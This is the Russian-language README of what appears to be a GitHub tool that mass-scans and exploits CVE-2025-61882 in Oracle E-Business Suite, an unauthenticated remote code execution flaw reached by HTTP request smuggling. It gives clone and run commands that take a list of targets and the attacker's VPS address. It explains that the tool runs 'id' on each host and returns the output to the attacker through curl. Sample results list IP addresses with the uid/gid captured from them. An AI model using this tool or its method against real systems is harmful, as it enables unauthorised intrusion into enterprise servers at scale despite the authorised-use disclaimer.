
Многопоточный сканер для CVE-2025-61882 в Oracle E-Business Suite, использующий контрабанду HTTP-запросов для достижения неаутентифицированного удалённого выполнения кода и проверки через вывод команд.
Быстрый многопоточный массовый сканер для обнаружения CVE-2025-61882 в установках Oracle E-Business Suite. Эта критическая уязвимость позволяет неаутентифицированное удалённое выполнение кода.
id и анализа выводаvuln-output.txtpip install requests
И всё. Нужны только Python 3.7+ и библиотека requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
Создайте файл targets.txt с одним URL в строке:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
Результаты сохраняются в vuln-output.txt:
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id и отправляет вывод обратно через curluid=...gid=...| Аргумент | Обязательный | По умолчанию | Описание |
|---|---|---|---|
--targets | Да | - | Путь к файлу, содержащему URL целей |
--lhost | Да | - | IP-адрес вашего VPS/атакующего |
--threads | Нет | 20 | Количество параллельных потоков |
Этот инструмент предназначен только для авторизованного тестирования безопасности. Всегда:
Несанкционированный доступ к компьютерным системам является незаконным.
Нашли ошибку? Есть запрос функции?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)Этот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Используйте на свой страх и риск.